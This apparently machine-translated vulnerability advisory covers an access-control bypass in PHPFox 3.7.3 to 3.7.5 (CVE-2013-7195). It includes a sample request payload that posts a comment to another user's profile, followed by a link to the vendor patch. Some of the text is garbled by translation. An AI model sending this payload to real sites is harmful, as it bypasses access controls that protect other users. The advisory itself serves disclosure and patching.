PHPFox access control security restriction bypass Vulnerability(CVE-2 0 1 3-7 1 9 5)-vulnerability warning-the black bar safety net

2014-04-09T00:00:00
ID MYHACK58:62201444312
Type myhack58
Reporter 佚名
Modified 2014-04-09T00:00:00

Description

Affected system:

PHPFox PHPFox Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 6 6 6 7 2 CVE(CAN) ID: CVE-2 0 1 3-7 1 9 5

PHPFox is a social network script.

PHPFox 3.7.3, 3.7.4, 3.7.5 in the realization of the presence of security restriction bypass vulnerability, an attacker can exploit this vulnerability PHPFox is a social network script.

<source: Wesley Henrique >

Test method: --------------------------------------------------------------------------------

Warning

The following procedures(methods)may carry offensive, for security research and teaching purposes. The user at your own risk! &core[ajax]=true&core[call]=comment. add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7 &val[type]=user_status&val[item_id]=2 7&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& amp; core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=2 9 0

Recommendations: -------------------------------------------------------------------------------- Manufacturers patch:

PHPFox \ ------ The current vendors have released an upgrade patch to fix this security issue, please go to the manufacturers home page download:

www.phpfox.com